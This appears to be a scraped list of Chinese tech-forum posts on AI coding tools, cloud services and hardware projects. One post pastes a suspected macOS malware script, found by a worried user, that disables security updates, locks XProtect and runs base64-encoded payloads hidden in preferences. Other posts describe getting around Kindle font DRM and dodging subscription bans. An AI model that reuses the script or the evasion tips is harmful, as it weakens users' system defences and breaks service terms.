  1. 是否是因为由于网络接口带宽不一致(源网络接口产生的流量远大于目标网络接口所能承载发送的网络带宽),再加上 bpf_sk_redirect_hash 没有背压(流量控制),导致数据堆积造成 OOM ?
  2. 如果是因为背压缺失的原因,该如果解决?实现流控 or 这种场景用 eBPF 做不合适?

希望各位前辈大佬指教!

作者: SunBK201 | 发布时间: 2026-03-30 18:06


24. 好消息,现在除了可以把同事炼化成 skill,前任也可以了, AI+同事/前任 skill+长期记忆=同事/前任,绝了



理论上来说,父母如果老去了以后是不是也能变成 skill ?
老板,儿子/女儿?
奴隶?

作者: lynn1su | 发布时间: 2026-03-31 09:59


25. cc 怎么不出个类似 codex 的 GUI

很方便啊,比 CLI 好看又方便

作者: tina2998 | 发布时间: 2026-03-31 10:19


26. 探讨 Harness Engineering

最近被这个概念轰炸了,简中互联网上全是令人费解的吹嘘概念,没有一个实战案例,我今早特意去看了一下Anthropic 的实践文章openai 的实践文章

A 的三 Agent ( Planner 、Generator 、Evaluator )思路能解决从 0 开始纯 AI 写项目的很多痛点,比如边界模糊、上下文焦虑、自我评估偏差等等。总之就是思路清晰,效果牛逼。

而 openai 的逻辑大致是 1.把项目文档都放入 docs ,用 AGENTS.md 渐进式披露 2.强制代码架构和风格 3.通过各种姿势让 codex 能读浏览器前后端日志然后自己修 bug 4.加了一个垃圾回收的步骤

按照我一个菜鸟程序员的直觉,A 的思路我看懂了,openai 的思路不明觉厉,我看完了文章想去尝试 A 的思路,但是我搜了一圈没找到类似的开源 repo ,插件,或者 skill ,有没有大佬锐评一下,或是已有实践给个仓库观摩看看

作者: NoobNoob030 | 发布时间: 2026-03-31 01:48


27. 卖 Token 给 OpenRouter 可行吗?

自己组装服务器,安装开源模型,提供 api 接口给 OpenRouter 这个账算的过来吗?感觉跟以前矿机差不多~~

作者: babyrjw | 发布时间: 2026-03-31 08:40


28. 手贱改了 DNS,悲剧了

域名在新网,想转到阿里云,为了平滑迁移,我把新网上域名的 dns 改成了阿里云的(其实是看错了,应该把域名解析转到阿里云)。现在新网的解析进不去了,阿里云上又添加不了,想把 dns 改回来还一直失败。。。

作者: renzhao | 发布时间: 2026-03-31 10:00


29. 你面对的是:编程界最强天团

当他们在同一个群,会有什么奇特的玩法呢?

https://github.com/andforce/octrix

AI

作者: andforce | 发布时间: 2026-03-31 02:57


30. macOS 疑似中毒

找到的主脚本如下

defaults read fqijeu lqqr_djhxqjf | base64 –decode

date
whoami

cd /Users/Shared
pwd


root_tasks() {

    /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false
    /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false

    kill_processes() {
      while true; do
        pgrep -fi 'CloudTelemetryService' | xargs -r -I {} sh -c 'kill -9 {} && echo "killed PID {}"'
        sleep 1
      done
    }

    kill_processes &

    perl -e 'open my $fh, "<", "/var/protected/xprotect/XPdb" or die $!; flock($fh, 2) or die $!; while (1) { sleep 60; }' &

    echo "I am a root task $(whoami)"
    
}

network_tasks() {
    while ! ping -c1 -W1 1.1.1.1 &> /dev/null ; do
        echo 'no net'
        sleep 5
    done

    echo 'net available'
    "$1"
    echo 'network task completed.'
}


localuser_tasks() {

    while true; do
        localuser=$(scutil <<< "show State:/Users/ConsoleUser" | awk '/Name :/ && ! /loginwindow/ { print $3 }')
        
        if [[ -n "$localuser" ]]; then
            break
        fi

        echo 'No logged-in user. Retrying...'
        sleep 5
    done

    echo "[LOGGED IN] $localuser"

    task() {
        sleep 30

        sudo -u "$localuser" /bin/bash <<EOF 
defaults read 'fqijeu' 'burlh_dqeur_rkq' | base64 --decode | env SRC='Daemon' sh >/dev/null 2>&1 &
EOF

    }

    network_tasks task &


}

loop_tasks() {
    echo 'Daemon is running...'

    if [ -e "/Users/echo/.kill" ]; then
      	echo 'killing...'

        grep -lir 'echo.*base64.*sh' /Library/LaunchDaemons/ 2>/dev/null | while read -r file; do
        	echo "$file"
        	rm -f "$file"
        done

        rm -f "/Users/echo/.kill"

        echo 'killed.'

        exit
    fi

}

root_tasks &
localuser_tasks &

while true; do
  loop_tasks &
  sleep 60
done 

作者: maxbug | 发布时间: 2026-03-31 10:02


31. claude-code 的代码泄露了?

https://github.com/instructkr/claude-code

作者: cumt21g | 发布时间: 2026-03-31 09:54


32. 用腾讯云踩坑了,建议别续费等待回收的服务器

分享一个踩坑经验

半个月前退还的服务器,今天点了下续费 1 个月,然后发现配置不对马上退还,结果只给退还半个月的费用。 一问客服,续费回收站的服务器是从最后停服时间开始扣费的,点续费的那一下半个月的费用已经扣掉了。

感觉不是很合理,回收站的服务器没有占用 CPU 内存,最多占用一下硬盘。续费一下多扣半个月。

作者: guichen | 发布时间: 2026-03-31 08:37


33. Agent 应该怎么设计才有价值呢?

Agent 怎么设计才能有价值呢?

目前在学习 Agent 比较热的开源项目,做了 2 个 demo

  1. 分别使用 Crewai 、Langgraph ,收集 Github 热点 AI 项目、AI 热点新闻,根据这些素材再生成 AI 日报,https://github.com/qwzhang01/miniclaw 分别是 crewai_base 分支和 main 分支;

  2. 模仿 OpenClaw ,让 AI 编程工具生成简化的 python 版本,在 https://github.com/qwzhang01/miniclaw

出发点是想直观理解 OpenClaw 设计以及 Crewai 、Langgraph 用法。

但是做出来后疑惑非常大,感觉加了一堆 Agent 的技术,输出的最终日报并没有比直接问大模型好多少。

就是一通操作猛如虎,回看口袋两毛五的感觉

所以一个能产生价值的 Agent 应该怎么设计呢,希望有大佬不吝指教

作者: qwzhang01 | 发布时间: 2026-03-31 09:26


34. Kindle 网页版的字体加密是怎么回事?我用 OCR 绕过了它

最近在做一个浏览器 TTS 扩展( CastReader ),碰到一个有意思的技术问题。 Kindle Cloud Reader ( read.amazon.com )用了一套自定义加密字体做 DRM 。打开任意一本书,右键检查元素,DOM 里的字符全是乱的——“chapter” 在源码里可能显示为 “∆♦⊗∑≈∂”。浏览器能正常渲染是因为加载了亚马逊的自定义字体文件做映射,但 DOM 里的 textContent 是废的。 这导致所有 TTS 扩展在 Kindle 上全军覆没。Read Aloud 、NaturalReader 、Speechify ,全部读出来是乱码。我测了 15 个扩展,没有一个能用。 我的解决方案:不读 DOM ,读像素。用 tesseract-wasm 在浏览器里跑 OCR ,直接识别渲染后的页面图像。整个流程: 1. 截取当前页面渲染结果 2. tesseract-wasm 本地 OCR (不上传任何数据) 3. 拿到文字 + 每个词的 bounding box 坐标 4. 送进 Kokoro TTS 生成语音 5. 用 bounding box 做段落级高亮跟随 首页 OCR 2-3 秒,之后自动翻页 + 预处理下一页,听的时候感觉不到延迟。 还做了个「发送到手机」功能,点一下通过 Telegram 把音频推到手机,自动翻页持续朗读。相当于把 Kindle 书库变成免费有声书。 技术细节写了一篇博客: https://castreader.ai/blog/how-castreader-cracks-kindle-font-encryption 扩展免费,不要账号: - Chrome: https://chromewebstore.google.com/detail/castreader-tts-reader/foammmkhpbeladledijkdljlechlclpb

有什么技术问题欢迎讨论

作者: vinxu | 发布时间: 2026-03-31 06:22


35. 现在高效使用 agent 的姿势应该是怎样的

用了一阵子 Claude Code 和 OpenCode ,不过实际对接的都是国产模型。粗略体验下来感觉还不错,框架性代码生成得挺像样,速度也能接受。 想问问各位大佬,你们平时都是怎么用 Agent 来规划开发的?感觉从零开发和接手现有项目,操作思路完全不一样,想借鉴下大家的用法。

作者: Tzu | 发布时间: 2026-03-31 02:36


36. 开源一个 ESP32 WOL ,云端唤醒局域网内的 PC, Vibe Coding 必备助手,配合 Tailscale 即刻穿回

老样子 这个项目也是源于自己的需求。 有时候在外面突然有想法或者想要做点啥事情 直接穿越会我那 128G 的台式机,然后 Vibe 一下,这就是我最真实的需求了 cli 大行其道,手机上也很方便。

直到遇到了 tailscale 然后 Vibe 了一个 ESP32 唤起项目,体验了一个来月了 完美。

有需要的朋友可以看看。

  • 远程唤醒 - 通过 WebSocket 连接公网服务器,实现外网唤醒局域网设备
  • 设备管理 - 添加、删除、唤醒已保存的设备
  • 局域网扫描 - 多轮 ARP 扫描,自动发现局域网设备,mDNS 识别主机名
  • 广播唤醒 - 一键向整个局域网发送广播唤醒包
  • 状态监控 - 实时显示运行时间、唤醒次数、温度、WiFi 信号、内存使用等
  • 双界面 - ESP32 本地 Web 界面 + Go 服务器远程界面
  • 深色/浅色主题 - 支持主题切换,自动保存偏好
  • OAuth 登录 - 支持微信 OAuth 登录
  • 灵活配置 - 支持命令行参数、环境变量、.env 文件三种配置方式

github 地址 https://github.com/MatrixSeven/esp32-wol-online

Imgur

Imgur

作者: molika | 发布时间: 2026-03-31 08:51


37. antigravity 额度几乎是乞丐版了, ultra 订阅也不行

ultra 订阅,今天早上到现在,一共用 opus 对话了 8 轮,也就是发出了 8 个指令。前两个是 planning ,后面 6 个是 fast 。 然后就限额了。

上周还能坚持对话三四十次,5 小时的额度限制我就没遇到过,过了个周末就拉成了这样。 这还用个屁,本来就是图 gemini 订阅带 antigravity 能用 opus ,现在几乎是不可用状态了。

作者: keyu1103 | 发布时间: 2026-03-30 06:30


38. OpenAI 为 Claude Code 做了一个调用 Codex 的插件

https://github.com/openai/codex-plugin-cc

作者: Livid | 发布时间: 2026-03-30 20:27


39. pro 订阅秒封

老 gmail,机场英国 ip+咸鱼英国手机验证码,注册没问题; 使用虚拟卡订阅 pro,秒封

作者: chutianyao | 发布时间: 2026-03-31 06:44


40. 目前用 bitget wallet 支付 claude api 是可以的,发帖看看能坚持几个月?

作者: ujujzhaos | 发布时间: 2026-03-31 06:28


41. 关于 claude code 官方订阅用量的问题

如果 max 5x 是 pro 的 5x 倍,价格也是 5x ,为啥我不能订阅 5 个 pro 来用呢,还能按需使用,我每个月只能用到大概 2x ~ 3x
据说现在是动态的倍数,就是 max 5x 不一定是 pro 的 5 倍,弱弱的问这不应该算骗人吗
这样换号用会被封号吗?我有好的支付渠道和家宽,目前没被封过号

作者: q534 | 发布时间: 2026-03-31 08:14


42. 推荐一个多用户的龙虾管理面板, 希望有需要的人用到.

https://github.com/Yuan-lab-LLM/ClawManager

作者: Hermitist | 发布时间: 2026-03-30 21:42


43. 给大家分享一个很有意思的 skill,快进来看看

作者: lynn1su | 发布时间: 2026-03-31 02:18


44. Kimi code plan 不便宜, GLM 编码便宜吗?

specs 模式开发,Claude pro 订阅不够用。尝试换经济点的组合策略,订阅 kimi Moderato 执行编码任务。

结果:
- 价格贵:开发完 1 个 feature ,消耗“周用量” 17%。一周只能开发 5 个 features ,Claude Sonnet 4.6 能开发 20 个。
- 吞吐慢:相比 Claude Sonnet 4.6 的等待体感,kimi 明显慢
- 质量差:虽然测试用例都跑通了,但 review 它生成的代码,质量偏离 claude.md, skill 定义的质量规范

开发工具都是 Claude code 。

我定义的编码工作流任务繁重,也是很耗 tokens ( typescript 项目):
- 编码:TDD 开发模式
- lint:保证没有 error
- type-check:严格模式
- 验收测试:前端( playwright 测试)、后端( API 端点 e2e 测试)

作者: daifee | 发布时间: 2026-03-31 02:18


45. 大厂内卷下的 $0 开发流:程序员是不是要被自己卷死啊

背景:学生,不想为 IDE/AI 订阅花钱,但又想用上好东西。折腾了一段时间,最终稳定在这套流程上。

  ╔══════════════════════════════════════════════════════════════════════╗
  ║              💸        $0 AI 开发流                                  ║
  ╠══════════════╦═══════════════════════╦═══════════════════════════════╣
  ║  ① 规划      ║  ② 执行               ║  ③ 验收 & Debug               ║
  ║              ║                       ║                               ║
  ║  Claude free ║  OpenAI Codex free    ║  Google Antigravity           ║
  ║  claude.ai   ║                       ║  (AI Pro · 学生优惠)           ║
  ╠══════════════╬═══════════════════════╬═══════════════════════════════╣
  ║              ║                       ║                               ║
  ║  → plan.md   ║  → 读取 plan.md       ║  → 接收代码                   ║
  ║    任务拆解  ║      按步骤生成代码     ║    并行跑 agent               ║
  ║    文件结构  ║      不来回聊天         ║    操作 Chrome 渲染            ║
  ║    边界条件  ║     省 Claude token    ║    定位 bug / 提 PR            ║
  ║              ║                       ║                               ║
  ╠══════════════╬═══════════════════════╬═══════════════════════════════╣
  ║  💰 免费额度 ║  💰 免费额度          ║  💰 1000 积分/月               ║
  ╚══════════════╩═══════════════════════╩═══════════════════════════════╝
         ↑                                          │
         └──────────── bug → 重新规划 ←─────────────┘

Claude free 网页版 → 写计划 md

claude.ai 免费版规划能力很强,我每次开新功能前让它输出一份 plan.md ,包括任务拆解、文件结构、实现步骤、需要注意的边界情况。这份文档后面会作为「需求书」传给 agent ,所以写得越细偏差越小。 免费版有消息限制,但规划阶段来回对话不多,基本够用。

OpenAI Codex free → 按 md 执行

free 账户可以用 codex 的 gpt-5.4 模型这点很好,把 plan.md 喂给 Codex ,让它按计划跑代码。这步我基本不跟它来回聊,就是给任务、等输出。

Google Antigravity → 验收 & debug

Antigravity 是 Google 去年 11 月跟 Gemini 3 一起发布的 agentic IDE ,VS Code 魔改,支持 Gemini 3.1 Pro / Flash 、Claude opus 4.6 (输出截断很麻烦)、GPT-OSS-120B 多个模型。可以直接操作 chrome 渲染网页、部署网站、测试,适合并行跑测试和找 bug 。 我用学生身份开了 Google AI Pro ($20/月,学生有优惠),每月有 1000 个 AI 积分。把 Codex 跑出来的代码丢进 Antigravity ,让 agent 跑测试、定位问题、提 PR ,1000 积分基本够一个月的验收工作量。


几个坑说一下:

  • Antigravity 最近在改配额规则,Pro 用户反映 Gemini 3.1 Pro 的 baseline quota 缩水很多,现在主要靠 models 那边 1000 积分兜底。
  • Codex 生成的代码质量参差,plan.md 写得越详细偏差越小,省得 Antigravity 那边要大返工。
  • 整条链路的瓶颈是 Google Antigravity 的消息截断限制,复杂项目规划阶段容易触顶,可以拆成多次对话解决,codex 也可以代替,但是太慢了,写 Ui 不如 Gemini 复刻得好看。

顺便,NVIDIA 也有免费开源 API ,过了一个多月了,一次没用上。

越折腾越觉得,以后技术变成了 skills ,工资变成了 token ,肉身变成了 homeless 🫠

作者: longxinglink | 发布时间: 2026-03-31 04:19


46. win11 经常系统信息的储存 显示 0GB

系统是 25H2(26200.8039),开机有时候风扇呼呼转,cpu 很高,有时候 100%,平常用很卡

作者: xbdsky | 发布时间: 2026-03-31 10:40


47. 智谱老用户续费窗口只剩最后一天,纠结要不要弃 Codex 转投 GLM 5.1

2 月 12 日智谱上线了新版套餐,下调了 5 小时用量限额、新增了周限额,老套餐同步停售。但官方给老用户开了个窗口期,到明天( 3 月 31 日)为止,还能按老套餐的价格和权益续订。

我刚好符合老用户条件,今天看了一下,确实还能续。目前我在用的是 Codex 拼车 Team ,搭配最新的 GPT 5.4 ,效果没得说。但听说 Team 最近在收紧,后续风控会越来越严,估计也长久不了。

我的日常需求主要是前端开发 + 龙虾,对模型能力有一定要求,但不要求那么顶级。

之前用智谱的时候还是 GLM 4.6 ,当时感觉效果还行,Lite 套餐额度也够用,速度不慢。现在 GLM 5.1 出来了,不知道实际能打 GPT 5.4 几成水平?有没有用过的兄弟说说?

现在的情况是:

  • Codex 拼车:效果顶,但风控、充值、稳定性都是隐患

  • 智谱老套餐:能锁一个长期稳定的低价权益,但如果 GLM 5.1 能力跟不上,续了也是吃灰

我现在想是 Claude Code + 智谱,但不确定 GLM 5.1 会不会太拉垮影响效率。

今天最后一天了,有没有懂的老哥给点建议?续还是不续?

作者: stanley0black | 发布时间: 2026-03-30 02:53


48. qwen3.6 plus 来了

貌似解决了 qwen3.5 plus 在处理文件名时加空格的问题。 opencode 上可以直接免费试用

重复我下面的话:今年 23
▣  Build · qwen3.6-plus-free · interrupted
重复我下面的话:今年 23
Thinking: The user wants me to repeat the phrase "今年 23".
I will output exactly that phrase.
今年 23 

作者: wsseo | 发布时间: 2026-03-31 00:18


49. 2026 年了,程序员用 chrome 还是用 Safari 比较多?可以说一下推荐的原因吗?

作者: liang37038 | 发布时间: 2026-03-29 14:39


50. 请教 redroid 的虚拟 wifi 有方案吗

最近捣鼓 redroid 。

好不容易在 unraid 上启动了,然鹅,某些 app 需要校验 wifi 连接。

搜索后,有位大佬 https://www.202016.xyz/2023/08/17/redroid-11-enable-virtwifi.html

有过相关方案,我是成功起来了。但是不知道为啥大佬提供的镜像 ro.product.cpu.abilist 会被覆盖成 x86 ,最后也是捣鼓起来了。最后是挂载内核的几个 properties ,安装上了 arm app 。但还是有问题,某些 app 会闪退。

想问下大佬们,docker android ,有什么 x86 的方案吗?虚拟 wifi 有啥关键字吗?

作者: frank1256 | 发布时间: 2026-03-31 03:39